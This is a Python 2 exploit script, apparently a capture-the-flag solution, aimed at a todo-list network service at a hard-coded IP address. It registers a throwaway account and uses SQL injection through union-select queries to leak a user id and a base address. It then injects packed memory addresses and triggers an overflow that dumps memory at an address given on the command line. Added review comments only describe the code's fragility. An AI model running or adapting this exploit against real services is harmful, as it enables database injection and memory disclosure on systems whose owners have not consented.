import random
import socket
import string
import sys
import time
from binascii import hexlify
from binascii import unhexlify
def make_address(offset, address):
    """Return ``offset + address`` packed as 8 little-endian bytes.

    The sum is rendered as 16 zero-padded hex digits, decoded to 8
    big-endian bytes, then reversed. Values wider than 64 bits produce
    a longer hex string and therefore a longer result (no truncation).
    """
    absolute = offset + address
    big_endian = unhexlify("%016x" % absolute)
    return big_endian[::-1]
def leak_data(address):
    """Talk to the hard-coded HOST:PORT service and print a hex dump labelled "Leaked".

    Python 2 only: uses the print statement and str-based payloads.
    `address` is combined with the `offset` read from the service via
    make_address() and appended to `payload`.

    NOTE(review): every recv() result is consumed without validation, the
    socket is never explicitly closed, and socket.timeout / ValueError /
    IndexError propagate to the caller.
    """
    HOST = '88.198.89.199'
    PORT = 1234
    # Connect
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # No error handling around connect(); failures raise socket.error.
    s.connect((HOST, PORT))
    # The 2-second timeout bounds every recv() below; a stall raises socket.timeout.
    s.settimeout(2)
    s.recv(1024)
    # Generate user
    # `random` (not `secrets`) is used here; adequate for a throwaway name only.
    username = ''.join([random.choice(string.ascii_letters + string.digits) for i in range(16)])
    # Register
    s.sendall("register %s %s\n" % (username, username))
    s.recv(1024)
    # Login
    s.sendall("login %s %s\n" % (username, username))
    s.recv(1024)
    # Leak userid
    s.sendall("search x' union select id from users where name='%s'#\n" % (username))
    s.recv(1024)
    s.sendall("show 0\n")
    # Fixed slice at index 3; int() raises ValueError if the response layout differs.
    userid = int(s.recv(1024)[3:])
    # print "Userid: %d" % userid
    # Leak base address
    s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(14)#\n")
    s.recv(1024)
    s.sendall("show 11\n")
    s.recv(4)
    # Exactly 6 bytes are read and interpreted little-endian; recv() may return
    # fewer, which is not checked. 0x19d0 is an undocumented magic offset.
    offset = int(hexlify(s.recv(6)[::-1]), 16) - 0x19d0
    # print "Base address: 0x%x" % offset
    s.recv(1024)
    # Add dummy value and payload
    # 56 + 1 + 7 = 64 bytes of fixed filler; the 0x2xxx constants are
    # undocumented in this file.
    payload = '\x00' * 56 + '\x02' + '\x00' * 7
    payload += make_address(offset, 0x223d)
    payload += make_address(offset, 0x2238)
    payload += make_address(offset, 0x2020)
    payload += make_address(offset, address)
    payload = hexlify(payload)
    s.sendall("add dummy'), (%s, unhex('%s'))##" % (userid, payload))
    s.recv(1024)
    # Overflow payload to 0x203d68
    s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(10) union select content from todos where user=%s#\n" % userid)
    s.recv(1024)
    # Test
    s.sendall("help\n")
    s.recv(1024)
    # Slice offset 115 and the dropped trailing byte assume a fixed response layout.
    data = s.recv(1024)[115:]
    print "Leaked: %s" % hexlify(data[:-1])
    # NOTE(review): `s` is never closed; the function returns None.
# Script entry: the single CLI argument is parsed as a hexadecimal address.
# Runs on import as well (no __main__ guard), exactly like the original.
target_address = int(sys.argv[1], 16)
leak_data(target_address)